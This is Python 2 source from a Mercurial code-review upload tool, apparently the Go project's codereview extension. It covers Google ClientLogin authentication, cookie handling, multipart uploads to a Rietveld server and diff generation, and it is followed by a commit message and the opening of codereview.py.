	The last used email address is saved to a file and offered up as a suggestion
	to the user. If the user presses enter without typing in anything the last
	used email address is used. If the user enters a new address, it is saved
	for next time we prompt.
	"""
	last_email_file_name = os.path.expanduser("~/.last_codereview_email_address")
	last_email = ""
	if os.path.exists(last_email_file_name):
		try:
			last_email_file = open(last_email_file_name, "r")
			last_email = last_email_file.readline().strip("\n")
			last_email_file.close()
			prompt += " [%s]" % last_email
		except IOError, e:
			# Best effort: an unreadable cache file just loses the suggestion.
			pass
	email = raw_input(prompt + ": ").strip()
	if email:
		try:
			last_email_file = open(last_email_file_name, "w")
			last_email_file.write(email)
			last_email_file.close()
		except IOError, e:
			# Best effort: failing to save the address is not fatal.
			pass
	else:
		# Empty input means "reuse the saved address".
		email = last_email
	return email
def StatusUpdate(msg):
	"""Print a status message to stdout.

	If 'verbosity' is greater than 0, print the message.

	Args:
		msg: The string to print.
	"""
	if verbosity <= 0:
		return
	sys.stdout.write("%s\n" % (msg,))
def ErrorExit(msg):
	"""Print an error message to stderr and exit."""
	sys.stderr.write("%s\n" % (msg,))
	sys.exit(1)
class ClientLoginError(urllib2.HTTPError):
	"""Raised to indicate there was an error authenticating with ClientLogin."""

	def __init__(self, url, code, msg, headers, args):
		urllib2.HTTPError.__init__(self, url, code, msg, headers, None)
		self.args = args
		# .reason is now a read-only property based on .msg
		# this means we ignore 'msg', but that seems to work fine.
		# The ClientLogin "Error" code (e.g. BadAuthentication) is what
		# callers such as _Authenticate actually inspect.
		self.msg = args["Error"]
class AbstractRpcServer(object):
	"""Provides a common interface for a simple RPC server."""

	def __init__(self, host, auth_function, host_override=None, extra_headers={}, save_cookies=False):
		"""Creates a new HttpRpcServer.

		Args:
			host: The host to send requests to.
			auth_function: A function that takes no arguments and returns an
				(email, password) tuple when called. Will be called if authentication
				is required.
			host_override: The host header to send to the server (defaults to host).
			extra_headers: A dict of extra headers to append to every request.
			save_cookies: If True, save the authentication cookies to local disk.
				If False, use an in-memory cookiejar instead. Subclasses must
				implement this functionality. Defaults to False.
		"""
		# NOTE(review): extra_headers is a mutable default argument; it
		# appears to be only read (see _CreateRequest), never mutated —
		# confirm before reusing the class elsewhere.
		self.host = host
		self.host_override = host_override
		self.auth_function = auth_function
		self.authenticated = False
		self.extra_headers = extra_headers
		self.save_cookies = save_cookies
		self.opener = self._GetOpener()
		if self.host_override:
			logging.info("Server: %s; Host: %s", self.host, self.host_override)
		else:
			logging.info("Server: %s", self.host)

	def _GetOpener(self):
		"""Returns an OpenerDirector for making HTTP requests.

		Returns:
			A urllib2.OpenerDirector object.
		"""
		raise NotImplementedError()

	def _CreateRequest(self, url, data=None):
		"""Creates a new urllib request."""
		logging.debug("Creating request for: '%s' with payload:\n%s", url, data)
		req = urllib2.Request(url, data=data)
		if self.host_override:
			req.add_header("Host", self.host_override)
		for key, value in self.extra_headers.iteritems():
			req.add_header(key, value)
		return req

	def _GetAuthToken(self, email, password):
		"""Uses ClientLogin to authenticate the user, returning an auth token.

		Args:
			email:    The user's email address
			password: The user's password

		Raises:
			ClientLoginError: If there was an error authenticating with ClientLogin.
			HTTPError: If there was some other form of HTTP error.

		Returns:
			The authentication token returned by ClientLogin.
		"""
		account_type = "GOOGLE"
		if self.host.endswith(".google.com") and not force_google_account:
			# Needed for use inside Google.
			account_type = "HOSTED"
		req = self._CreateRequest(
			url="https://www.google.com/accounts/ClientLogin",
			data=urllib.urlencode({
					"Email": email,
					"Passwd": password,
					"service": "ah",
					"source": "rietveld-codereview-upload",
					"accountType": account_type,
			}),
		)
		try:
			response = self.opener.open(req)
			response_body = response.read()
			# ClientLogin replies with key=value lines; we need "Auth".
			response_dict = dict(x.split("=") for x in response_body.split("\n") if x)
			return response_dict["Auth"]
		except urllib2.HTTPError, e:
			if e.code == 403:
				# 403 carries a structured Error code in the body.
				body = e.read()
				response_dict = dict(x.split("=", 1) for x in body.split("\n") if x)
				raise ClientLoginError(req.get_full_url(), e.code, e.msg, e.headers, response_dict)
			else:
				raise

	def _GetAuthCookie(self, auth_token):
		"""Fetches authentication cookies for an authentication token.

		Args:
			auth_token: The authentication token returned by ClientLogin.

		Raises:
			HTTPError: If there was an error fetching the authentication cookies.
		"""
		# This is a dummy value to allow us to identify when we're successful.
		continue_location = "http://localhost/"
		args = {"continue": continue_location, "auth": auth_token}
		req = self._CreateRequest("https://%s/_ah/login?%s" % (self.host, urllib.urlencode(args)))
		try:
			response = self.opener.open(req)
		except urllib2.HTTPError, e:
			# The opener ignores redirects, so success arrives as a 302 "error".
			response = e
		if (response.code != 302 or
				response.info()["location"] != continue_location):
			raise urllib2.HTTPError(req.get_full_url(), response.code, response.msg, response.headers, response.fp)
		self.authenticated = True

	def _Authenticate(self):
		"""Authenticates the user.

		The authentication process works as follows:
		1) We get a username and password from the user
		2) We use ClientLogin to obtain an AUTH token for the user
			(see http://code.google.com/apis/accounts/AuthForInstalledApps.html).
		3) We pass the auth token to /_ah/login on the server to obtain an
			authentication cookie. If login was successful, it tries to redirect
			us to the URL we provided.

		If we attempt to access the upload API without first obtaining an
		authentication cookie, it returns a 401 response (or a 302) and
		directs us to authenticate ourselves with ClientLogin.
		"""
		# Up to three attempts; only BadAuthentication retries the prompt,
		# the other ClientLogin error codes print an explanation and stop.
		for i in range(3):
			credentials = self.auth_function()
			try:
				auth_token = self._GetAuthToken(credentials[0], credentials[1])
			except ClientLoginError, e:
				if e.msg == "BadAuthentication":
					print >>sys.stderr, "Invalid username or password."
					continue
				if e.msg == "CaptchaRequired":
					print >>sys.stderr, (
						"Please go to\n"
						"https://www.google.com/accounts/DisplayUnlockCaptcha\n"
						"and verify you are a human.  Then try again.")
					break
				if e.msg == "NotVerified":
					print >>sys.stderr, "Account not verified."
					break
				if e.msg == "TermsNotAgreed":
					print >>sys.stderr, "User has not agreed to TOS."
					break
				if e.msg == "AccountDeleted":
					print >>sys.stderr, "The user account has been deleted."
					break
				if e.msg == "AccountDisabled":
					print >>sys.stderr, "The user account has been disabled."
					break
				if e.msg == "ServiceDisabled":
					print >>sys.stderr, "The user's access to the service has been disabled."
					break
				if e.msg == "ServiceUnavailable":
					print >>sys.stderr, "The service is not available; try again later."
					break
				raise
			self._GetAuthCookie(auth_token)
			return

	def Send(self, request_path, payload=None,
			content_type="application/octet-stream",
			timeout=None,
			**kwargs):
		"""Sends an RPC and returns the response.

		Args:
			request_path: The path to send the request to, eg /api/appversion/create.
			payload: The body of the request, or None to send an empty request.
			content_type: The Content-Type header to use.
			timeout: timeout in seconds; default None i.e. no timeout.
				(Note: for large requests on OS X, the timeout doesn't work right.)
			kwargs: Any keyword arguments are converted into query string parameters.

		Returns:
			The response body, as a string.
		"""
		# TODO: Don't require authentication.  Let the server say
		# whether it is necessary.
		if not self.authenticated:
			self._Authenticate()

		old_timeout = socket.getdefaulttimeout()
		socket.setdefaulttimeout(timeout)
		try:
			tries = 0
			while True:
				tries += 1
				args = dict(kwargs)
				url = "https://%s%s" % (self.host, request_path)
				if args:
					url += "?" + urllib.urlencode(args)
				req = self._CreateRequest(url=url, data=payload)
				req.add_header("Content-Type", content_type)
				try:
					f = self.opener.open(req)
					response = f.read()
					f.close()
					return response
				except urllib2.HTTPError, e:
					if tries > 3:
						raise
					elif e.code == 401 or e.code == 302:
						# Unauthorized or redirected to login: authenticate and retry.
						self._Authenticate()
					else:
						raise
		finally:
			socket.setdefaulttimeout(old_timeout)
class HttpRpcServer(AbstractRpcServer):
	"""Provides a simplified RPC-style interface for HTTP requests."""

	def _Authenticate(self):
		"""Save the cookie jar after authentication."""
		super(HttpRpcServer, self)._Authenticate()
		if self.save_cookies:
			StatusUpdate("Saving authentication cookies to %s" % self.cookie_file)
			self.cookie_jar.save()

	def _GetOpener(self):
		"""Returns an OpenerDirector that supports cookies and ignores redirects.

		Returns:
			A urllib2.OpenerDirector object.
		"""
		# No redirect handler is installed, so 302s surface as HTTPError;
		# AbstractRpcServer.Send relies on that to trigger authentication.
		opener = urllib2.OpenerDirector()
		opener.add_handler(urllib2.ProxyHandler())
		opener.add_handler(urllib2.UnknownHandler())
		opener.add_handler(urllib2.HTTPHandler())
		opener.add_handler(urllib2.HTTPDefaultErrorHandler())
		opener.add_handler(urllib2.HTTPSHandler())
		opener.add_handler(urllib2.HTTPErrorProcessor())
		if self.save_cookies:
			self.cookie_file = os.path.expanduser("~/.codereview_upload_cookies_" + server)
			self.cookie_jar = cookielib.MozillaCookieJar(self.cookie_file)
			if os.path.exists(self.cookie_file):
				try:
					self.cookie_jar.load()
					# Assume loaded cookies are still valid; a 401 will
					# trigger a fresh login if they are not.
					self.authenticated = True
					StatusUpdate("Loaded authentication cookies from %s" % self.cookie_file)
				except (cookielib.LoadError, IOError):
					# Failed to load cookies - just ignore them.
					pass
			else:
				# Create an empty cookie file with mode 600
				fd = os.open(self.cookie_file, os.O_CREAT, 0600)
				os.close(fd)
			# Always chmod the cookie file
			os.chmod(self.cookie_file, 0600)
		else:
			# Don't save cookies across runs of update.py.
			self.cookie_jar = cookielib.CookieJar()
		opener.add_handler(urllib2.HTTPCookieProcessor(self.cookie_jar))
		return opener
def GetRpcServer(options):
	"""Returns an instance of an AbstractRpcServer.

	Returns:
		A new AbstractRpcServer, on which RPC calls can be made.
	"""
	rpc_server_class = HttpRpcServer

	def GetUserCredentials():
		"""Prompts the user for a username and password."""
		# Disable status prints so they don't obscure the password prompt.
		global global_status
		st = global_status
		global_status = None

		email = options.email
		if email is None:
			email = GetEmail("Email (login for uploading to %s)" % options.server)
		password = getpass.getpass("Password for %s: " % email)

		# Put status back.
		global_status = st
		return (email, password)

	# If this is the dev_appserver, use fake authentication.
	host = (options.host or options.server).lower()
	if host == "localhost" or host.startswith("localhost:"):
		email = options.email
		if email is None:
			email = "test@example.com"
			logging.info("Using debug user %s.  Override with --email" % email)
		server = rpc_server_class(
			options.server,
			lambda: (email, "password"),
			host_override=options.host,
			extra_headers={"Cookie": 'dev_appserver_login="%s:False"' % email},
			save_cookies=options.save_cookies)
		# Don't try to talk to ClientLogin.
		server.authenticated = True
		return server

	return rpc_server_class(options.server, GetUserCredentials,
		host_override=options.host, save_cookies=options.save_cookies)
def EncodeMultipartFormData(fields, files):
	"""Encode form fields for multipart/form-data.

	Args:
		fields: A sequence of (name, value) elements for regular form fields.
		files: A sequence of (name, filename, value) elements for data to be
			uploaded as files.
	Returns:
		(content_type, body) ready for httplib.HTTP instance.
	Source:
		http://aspn.activestate.com/ASPN/Cookbook/Python/Recipe/146306
	"""
	# NOTE(review): BOUNDARY is a fixed string and is not checked against
	# the field values; a value containing it would corrupt the encoding.
	BOUNDARY = '-M-A-G-I-C---B-O-U-N-D-A-R-Y-'
	CRLF = '\r\n'
	lines = []

	for (key, value) in fields:
		typecheck(key, str)
		typecheck(value, str)
		lines.append('--' + BOUNDARY)
		lines.append('Content-Disposition: form-data; name="%s"' % key)
		lines.append('')
		lines.append(value)

	for (key, filename, value) in files:
		typecheck(key, str)
		typecheck(filename, str)
		typecheck(value, str)
		lines.append('--' + BOUNDARY)
		lines.append('Content-Disposition: form-data; name="%s"; filename="%s"' % (key, filename))
		lines.append('Content-Type: %s' % GetContentType(filename))
		lines.append('')
		lines.append(value)

	lines.append('--' + BOUNDARY + '--')
	lines.append('')
	body = CRLF.join(lines)
	content_type = 'multipart/form-data; boundary=%s' % BOUNDARY
	return content_type, body
def GetContentType(filename):
	"""Helper to guess the content-type from the filename."""
	guessed, _ = mimetypes.guess_type(filename)
	if guessed:
		return guessed
	return 'application/octet-stream'
# Use a shell for subcommands on Windows to get a PATH search.
# (Passed as the shell= argument of subprocess.Popen below.)
use_shell = sys.platform.startswith("win")
def RunShellWithReturnCode(command, print_output=False,
		universal_newlines=True, env=os.environ):
	"""Executes a command and returns the output from stdout and the return code.

	Args:
		command: Command to execute.
		print_output: If True, the output is printed to stdout.
			If False, both stdout and stderr are ignored.
		universal_newlines: Use universal_newlines flag (default: True).

	Returns:
		Tuple (output, return code)
	"""
	logging.info("Running %s", command)
	p = subprocess.Popen(command, stdout=subprocess.PIPE, stderr=subprocess.PIPE,
		shell=use_shell, universal_newlines=universal_newlines, env=env)
	if print_output:
		# Echo stdout line by line while also collecting it.
		output_array = []
		while True:
			line = p.stdout.readline()
			if not line:
				break
			print line.strip("\n")
			output_array.append(line)
		output = "".join(output_array)
	else:
		output = p.stdout.read()
	p.wait()
	# NOTE(review): stderr is only drained after wait(); a child that fills
	# the stderr pipe first could deadlock — confirm commands stay small.
	errout = p.stderr.read()
	if print_output and errout:
		print >>sys.stderr, errout
	p.stdout.close()
	p.stderr.close()
	return output, p.returncode
def RunShell(command, silent_ok=False, universal_newlines=True,
		print_output=False, env=os.environ):
	"""Run command and return its stdout; exit the process on a nonzero
	status or (unless silent_ok) on empty output."""
	output, status = RunShellWithReturnCode(command, print_output, universal_newlines, env)
	if status:
		ErrorExit("Got error status from %s:\n%s" % (command, output))
	if not output and not silent_ok:
		ErrorExit("No output from %s" % command)
	return output
class VersionControlSystem(object):
	"""Abstract base class providing an interface to the VCS."""
	def __init__(self, options):
		"""Constructor.
		Args:
			options: Command line options.
		"""
		self.options = options
	def GenerateDiff(self, args):
		"""Return the current diff as a string.
		Args:
			args: Extra arguments to pass to the diff command.
		"""
		raise NotImplementedError(
			"abstract method -- subclass %s must override" % self.__class__)
	def GetUnknownFiles(self):
		"""Return a list of files unknown to the VCS."""
		raise NotImplementedError(
			"abstract method -- subclass %s must override" % self.__class__)
	def CheckForUnknownFiles(self):
		"""Show an "are you sure?" prompt if there are unknown files."""
		unknown_files = self.GetUnknownFiles()
		if unknown_files:
			print "The following files are not added to version control:"
			for line in unknown_files:
				print line
			prompt = "Are you sure to continue?(y/N) "
			answer = raw_input(prompt).strip()
			if answer != "y":
				ErrorExit("User aborted")
	def GetBaseFile(self, filename):
		"""Get the content of the upstream version of a file.
		Returns:
			A tuple (base_content, new_content, is_binary, status)
			base_content: The contents of the base file.
			new_content: For text files, this is empty. For binary files, this is
				the contents of the new file, since the diff output won't contain
				information to reconstruct the current file.
			is_binary: True iff the file is binary.
			status: The status of the file.
		"""
		raise NotImplementedError(
			"abstract method -- subclass %s must override" % self.__class__)
	def GetBaseFiles(self, diff):
		"""Helper that calls GetBase file for each file in the patch.
		Returns:
			A dictionary that maps from filename to GetBaseFile's tuple. Filenames
			are retrieved based on lines that start with "Index:" or
			"Property changes on:".
		"""
		files = {}
		for line in diff.splitlines(True):
			if line.startswith('Index:') or line.startswith('Property changes on:'):
				unused, filename = line.split(':', 1)
				# On Windows if a file has property changes its filename uses '\'
				# instead of '/'.
				filename = to_slash(filename.strip())
				files[filename] = self.GetBaseFile(filename)
		return files
	def UploadBaseFiles(self, issue, rpc_server, patch_list, patchset, options,
			files):
		"""Uploads the base files (and if necessary, the current ones as well)."""
		def UploadFile(filename, file_id, content, is_binary, status, is_base):
			"""Uploads a file to the server."""
			set_status("uploading " + filename)
			file_too_large = False
			if is_base:
				type = "base"
			else:
				type = "current"
			# Oversized files are recorded on the server but their content is dropped.
			if len(content) > MAX_UPLOAD_SIZE:
				print ("Not uploading the %s file for %s because it's too large." %
					(type, filename))
				file_too_large = True
				content = ""
			checksum = md5(content).hexdigest()
			if options.verbose > 0 and not file_too_large:
				print "Uploading %s file for %s" % (type, filename)
			url = "/%d/upload_content/%d/%d" % (int(issue), int(patchset), file_id)
			form_fields = [
				("filename", filename),
				("status", status),
				("checksum", checksum),
				("is_binary", str(is_binary)),
				("is_current", str(not is_base)),
			]
			if file_too_large:
				form_fields.append(("file_too_large", "1"))
			if options.email:
				form_fields.append(("user", options.email))
			ctype, body = EncodeMultipartFormData(form_fields, [("data", filename, content)])
			response_body = rpc_server.Send(url, body, content_type=ctype)
			if not response_body.startswith("OK"):
				StatusUpdate(" --> %s" % response_body)
				sys.exit(1)
		# Don't want to spawn too many threads, nor do we want to
		# hit Rietveld too hard, or it will start serving 500 errors.
		# When 8 works, it's no better than 4, and sometimes 8 is
		# too many for Rietveld to handle.
		MAX_PARALLEL_UPLOADS = 4
		sema = threading.BoundedSemaphore(MAX_PARALLEL_UPLOADS)
		upload_threads = []
		finished_upload_threads = []
		class UploadFileThread(threading.Thread):
			# One worker per file; releases the semaphore when its upload finishes.
			def __init__(self, args):
				threading.Thread.__init__(self)
				self.args = args
			def run(self):
				UploadFile(*self.args)
				finished_upload_threads.append(self)
				sema.release()
		def StartUploadFile(*args):
			# Blocks until a semaphore slot is free, then reaps finished threads
			# before launching a new one.
			sema.acquire()
			while len(finished_upload_threads) > 0:
				t = finished_upload_threads.pop()
				upload_threads.remove(t)
				t.join()
			t = UploadFileThread(args)
			upload_threads.append(t)
			t.start()
		def WaitForUploads():
			for t in upload_threads:
				t.join()
		patches = dict()
		# Invert patch_list into a filename -> patch-id map.
		[patches.setdefault(v, k) for k, v in patch_list]
		for filename in patches.keys():
			base_content, new_content, is_binary, status = files[filename]
			file_id_str = patches.get(filename)
			# A "nobase" marker in the id means the server does not need the base file.
			if file_id_str.find("nobase") != -1:
				base_content = None
				file_id_str = file_id_str[file_id_str.rfind("_") + 1:]
			file_id = int(file_id_str)
			if base_content != None:
				StartUploadFile(filename, file_id, base_content, is_binary, status, True)
			if new_content != None:
				StartUploadFile(filename, file_id, new_content, is_binary, status, False)
		WaitForUploads()
	def IsImage(self, filename):
		"""Returns true if the filename has an image extension."""
		mimetype = mimetypes.guess_type(filename)[0]
		if not mimetype:
			return False
		return mimetype.startswith("image/")
	def IsBinary(self, filename):
		"""Returns true if the guessed mimetype isn't in the text group."""
		mimetype = mimetypes.guess_type(filename)[0]
		if not mimetype:
			return False # e.g. README, "real" binaries usually have an extension
		# special case for text files which don't start with text/
		if mimetype in TEXT_MIMETYPES:
			return False
		return not mimetype.startswith("text/")
class FakeMercurialUI(object):
	"""In-memory stand-in for a Mercurial ui object.

	Captures everything written to it in self.output so that command output
	can be inspected instead of printed; config/path queries are delegated to
	the real global_ui.
	"""
	def __init__(self):
		self.quiet = True
		self.output = ''
	def write(self, *args, **opts):
		# ui.write may be handed several fragments; join them with spaces.
		self.output = self.output + ' '.join(args)
	def copy(self):
		# A real ui clones itself here; sharing one buffer is fine for our use.
		return self
	def status(self, *args, **opts):
		pass
	def formatter(self, topic, opts):
		from mercurial.formatter import plainformatter
		return plainformatter(self, topic, opts)
	def readconfig(self, *args, **opts):
		pass
	def expandpath(self, *args, **opts):
		return global_ui.expandpath(*args, **opts)
	def configitems(self, *args, **opts):
		return global_ui.configitems(*args, **opts)
	def config(self, *args, **opts):
		return global_ui.config(*args, **opts)
use_hg_shell = False # set to True to shell out to hg always; slower
class MercurialVCS(VersionControlSystem):
	"""Implementation of the VersionControlSystem interface for Mercurial."""
	def __init__(self, options, ui, repo):
		super(MercurialVCS, self).__init__(options)
		self.ui = ui
		self.repo = repo
		# Cached output of "hg status -C"; filled lazily by get_hg_status.
		self.status = None
		# Absolute path to repository (we can be in a subdir)
		self.repo_dir = os.path.normpath(repo.root)
		# Compute the subdir
		cwd = os.path.normpath(os.getcwd())
		assert cwd.startswith(self.repo_dir)
		self.subdir = cwd[len(self.repo_dir):].lstrip(r"\/")
		if self.options.revision:
			self.base_rev = self.options.revision
		else:
			# Prefer the MQ parent (qparent) as the base when patch queues are in use.
			mqparent, err = RunShellWithReturnCode(['hg', 'log', '--rev', 'qparent', '--template={node}'])
			if not err and mqparent != "":
				self.base_rev = mqparent
			else:
				out = RunShell(["hg", "parents", "-q"], silent_ok=True).strip()
				if not out:
					# No revisions; use 0 to mean a repository with nothing.
					out = "0:0"
				self.base_rev = out.split(':')[1].strip()
	def _GetRelPath(self, filename):
		"""Get relative path of a file according to the current directory,
		given its logical path in the repo."""
		assert filename.startswith(self.subdir), (filename, self.subdir)
		return filename[len(self.subdir):].lstrip(r"\/")
	def GenerateDiff(self, extra_args):
		"""Run "hg diff --git" and rewrite its headers into svn-diff form."""
		# If no file specified, restrict to the current subdir
		extra_args = extra_args or ["."]
		cmd = ["hg", "diff", "--git", "-r", self.base_rev] + extra_args
		data = RunShell(cmd, silent_ok=True)
		svndiff = []
		filecount = 0
		for line in data.splitlines():
			m = re.match("diff --git a/(\S+) b/(\S+)", line)
			if m:
				# Modify line to make it look like as it comes from svn diff.
				# With this modification no changes on the server side are required
				# to make upload.py work with Mercurial repos.
				# NOTE: for proper handling of moved/copied files, we have to use
				# the second filename.
				filename = m.group(2)
				svndiff.append("Index: %s" % filename)
				svndiff.append("=" * 67)
				filecount += 1
				logging.info(line)
			else:
				svndiff.append(line)
		if not filecount:
			ErrorExit("No valid patches found in output from hg diff")
		return "\n".join(svndiff) + "\n"
	def GetUnknownFiles(self):
		"""Return a list of files unknown to the VCS."""
		args = []
		status = RunShell(["hg", "status", "--rev", self.base_rev, "-u", "."],
				silent_ok=True)
		unknown_files = []
		for line in status.splitlines():
			st, fn = line.split(" ", 1)
			if st == "?":
				unknown_files.append(fn)
		return unknown_files
	def get_hg_status(self, rev, path):
		"""Return the status line(s) for path at rev (two lines for copies)."""
		# We'd like to use 'hg status -C path', but that is buggy
		# (see http://mercurial.selenic.com/bts/issue3023).
		# Instead, run 'hg status -C' without a path
		# and skim the output for the path we want.
		if self.status is None:
			if use_hg_shell:
				out = RunShell(["hg", "status", "-C", "--rev", rev])
			else:
				fui = FakeMercurialUI()
				ret = hg_commands.status(fui, self.repo, *[], **{'rev': [rev], 'copies': True})
				if ret:
					raise hg_util.Abort(ret)
				out = fui.output
			self.status = out.splitlines()
		for i in range(len(self.status)):
			# line is
			# A path
			# M path
			# etc
			line = to_slash(self.status[i])
			if line[2:] == path:
				if i+1 < len(self.status) and self.status[i+1][:2] == ' ':
					return self.status[i:i+2]
				return self.status[i:i+1]
		raise hg_util.Abort("no status for " + path)
	def GetBaseFile(self, filename):
		"""Return (base_content, new_content, is_binary, status) for filename."""
		set_status("inspecting " + filename)
		# "hg status" and "hg cat" both take a path relative to the current subdir
		# rather than to the repo root, but "hg diff" has given us the full path
		# to the repo root.
		base_content = ""
		new_content = None
		is_binary = False
		oldrelpath = relpath = self._GetRelPath(filename)
		out = self.get_hg_status(self.base_rev, relpath)
		status, what = out[0].split(' ', 1)
		# An "A"dded file with a second status line is really a copy/rename.
		if len(out) > 1 and status == "A" and what == relpath:
			oldrelpath = out[1].strip()
			status = "M"
		if ":" in self.base_rev:
			base_rev = self.base_rev.split(":", 1)[0]
		else:
			base_rev = self.base_rev
		if status != "A":
			if use_hg_shell:
				base_content = RunShell(["hg", "cat", "-r", base_rev, oldrelpath], silent_ok=True)
			else:
				base_content = str(self.repo[base_rev][oldrelpath].data())
			is_binary = "\0" in base_content # Mercurial's heuristic
		if status != "R":
			new_content = open(relpath, "rb").read()
			is_binary = is_binary or "\0" in new_content
		if is_binary and base_content and use_hg_shell:
			# Fetch again without converting newlines
			base_content = RunShell(["hg", "cat", "-r", base_rev, oldrelpath],
					silent_ok=True, universal_newlines=False)
		if not is_binary or not self.IsImage(relpath):
			new_content = None
		return base_content, new_content, is_binary, status
# NOTE: The SplitPatch function is duplicated in engine.py, keep them in sync.
def SplitPatch(data):
	"""Splits a patch into separate pieces for each file.
	Args:
		data: A string containing the output of svn diff.
	Returns:
		A list of 2-tuple (filename, text) where text is the svn diff output
		pertaining to filename.
	"""
	patches = []
	filename = None
	diff = []
	for line in data.splitlines(True):
		new_filename = None
		if line.startswith('Index:'):
			unused, new_filename = line.split(':', 1)
			new_filename = new_filename.strip()
		elif line.startswith('Property changes on:'):
			unused, temp_filename = line.split(':', 1)
			# When a file is modified, paths use '/' between directories, however
			# when a property is modified '\' is used on Windows. Make them the same
			# otherwise the file shows up twice.
			temp_filename = to_slash(temp_filename.strip())
			if temp_filename != filename:
				# File has property changes but no modifications, create a new diff.
				new_filename = temp_filename
		if new_filename:
			# Flush the previous file's accumulated lines before starting a new one.
			if filename and diff:
				patches.append((filename, ''.join(diff)))
			filename = new_filename
			diff = [line]
			continue
		# diff starts as [] and is only ever rebound to a fresh list, so it can
		# never be None; the old "if diff is not None" guard was dead code.
		diff.append(line)
	if filename and diff:
		patches.append((filename, ''.join(diff)))
	return patches
def UploadSeparatePatches(issue, rpc_server, patchset, data, options):
	"""Uploads a separate patch for each file in the diff output.
	Returns a list of [patch_key, filename] for each file.
	"""
	patches = SplitPatch(data)
	rv = []
	for patch in patches:
		set_status("uploading patch for " + patch[0])
		# Skip (but keep going) when one file's patch exceeds the server limit.
		if len(patch[1]) > MAX_UPLOAD_SIZE:
			print ("Not uploading the patch for " + patch[0] +
				" because the file is too large.")
			continue
		form_fields = [("filename", patch[0])]
		if not options.download_base:
			form_fields.append(("content_upload", "1"))
		files = [("data", "data.diff", patch[1])]
		ctype, body = EncodeMultipartFormData(form_fields, files)
		url = "/%d/upload_patch/%d" % (int(issue), int(patchset))
		print "Uploading patch for " + patch[0]
		response_body = rpc_server.Send(url, body, content_type=ctype)
		# Server replies "OK\n<patch key>" on success.
		lines = response_body.splitlines()
		if not lines or lines[0] != "OK":
			StatusUpdate(" --> %s" % response_body)
			sys.exit(1)
		rv.append([lines[1], patch[0]])
	return rv
codereview: don't warn about secret commits
Normally the codereview plugin disables adding new commits
when not using the submit command. Unfortunately this makes
it impossible to use the Mercurial Queues extension at the
same time.
A feature called "Phases" was introduced in Mercurial 2.1
that allows marking commits as being secret; this means
they will never be pushed to the upstream repository.
We can take advantage of this feature to allow the use of
Mercurial Queues if the mq.secret option has been set in
hgrc(5) and a recent version of Mercurial is used.
R=golang-dev, rsc, minux.ma
CC=golang-dev
https://golang.org/cl/7398055
# coding=utf-8
# (The line above is necessary so that I can use 世界 in the
# *comment* below without Python getting all bent out of shape.)
# Copyright 2007-2009 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
'''Mercurial interface to codereview.appspot.com.
To configure, set the following options in
your repository's .hg/hgrc file.
[extensions]
codereview = /path/to/codereview.py
[codereview]
server = codereview.appspot.com
The server should be running Rietveld; see http://code.google.com/p/rietveld/.
In addition to the new commands, this extension introduces
the file pattern syntax @nnnnnn, where nnnnnn is a change list
number, to mean the files included in that change list, which
must be associated with the current client.
For example, if change 123456 contains the files x.go and y.go,
"hg diff @123456" is equivalent to"hg diff x.go y.go".
'''
import sys
# This file is a Mercurial extension, loaded by hg itself; refuse to run standalone.
if __name__ == "__main__":
	print >>sys.stderr, "This is a Mercurial extension and should not be invoked directly."
	sys.exit(2)
# We require Python 2.6 for the json package.
if sys.version < '2.6':
	print >>sys.stderr, "The codereview extension requires Python 2.6 or newer."
	print >>sys.stderr, "You are running Python " + sys.version
	sys.exit(2)
import json
import os
import re
import stat
import subprocess
import threading
import time
from mercurial import commands as hg_commands
from mercurial import util as hg_util
# Module-level state, populated during extension setup / from hgrc.
defaultcc = None            # default CC list for new CLs
codereview_disabled = None  # non-None reason string disables the extension
real_rollback = None        # saved original rollback command
releaseBranch = None        # current release branch name, if any
server = "codereview.appspot.com"  # code review server host
server_url_base = None      # full URL prefix for CL links
#######################################################################
# Normally I would split this into multiple files, but it simplifies
# import path headaches to keep it all in one file. Sorry.
# The different parts of the file are separated by banners like this one.
#######################################################################
# Helpers
def RelativePath(path, cwd):
	"""Return path relative to cwd when path lies inside cwd, else path unchanged."""
	n = len(cwd)
	# len(path) > n guards the path[n] lookup: when path == cwd exactly,
	# the original code raised IndexError instead of returning path.
	if path.startswith(cwd) and len(path) > n and path[n] == '/':
		return path[n+1:]
	return path
def Sub(l1, l2):
	"""Return the elements of l1 that do not appear in l2, preserving order."""
	kept = []
	for item in l1:
		if item not in l2:
			kept.append(item)
	return kept
def Add(l1, l2):
	"""Return the sorted union of l1 and l2 (elements of l2 already in l1 are dropped)."""
	merged = l1 + [item for item in l2 if item not in l1]
	merged.sort()
	return merged
def Intersect(l1, l2):
	"""Return the elements of l1 that also appear in l2, in l1 order."""
	common = []
	for item in l1:
		if item in l2:
			common.append(item)
	return common
#######################################################################
# RE: UNICODE STRING HANDLING
#
# Python distinguishes between the str (string of bytes)
# and unicode (string of code points) types. Most operations
# work on either one just fine, but some (like regexp matching)
# require unicode, and others (like write) require str.
#
# As befits the language, Python hides the distinction between
# unicode and str by converting between them silently, but
# *only* if all the bytes/code points involved are 7-bit ASCII.
# This means that if you're not careful, your program works
# fine on "hello, world" and fails on "hello, 世界". And of course,
# the obvious way to be careful - use static types - is unavailable.
# So the only way is trial and error to find where to put explicit
# conversions.
#
# Because more functions do implicit conversion to str (string of bytes)
# than do implicit conversion to unicode (string of code points),
# the convention in this module is to represent all text as str,
# converting to unicode only when calling a unicode-only function
# and then converting back to str as soon as possible.
def typecheck(s, t):
	"""Abort with a descriptive message unless s is exactly of type t.

	Deliberately uses type() equality rather than isinstance(): the str/unicode
	distinction this module polices is exact, not subclass-tolerant.
	"""
	actual = type(s)
	if actual != t:
		raise hg_util.Abort("type check failed: %s has type %s != %s" % (repr(s), actual, t))
# If we have to pass unicode instead of str, ustr does that conversion clearly.
def ustr(s):
	"""Convert a str (UTF-8 bytes) to unicode, type-checking the input first."""
	typecheck(s, str)
	decoded = s.decode("utf-8")
	return decoded
# Even with those, Mercurial still sometimes turns unicode into str
# and then tries to use it as ascii. Change Mercurial's default.
def set_mercurial_encoding_to_utf8():
	"""Force Mercurial's internal text encoding to UTF-8."""
	from mercurial import encoding
	encoding.encoding = 'utf-8'
# Applied immediately at import time, before any hg commands run.
set_mercurial_encoding_to_utf8()
# Even with those we still run into problems.
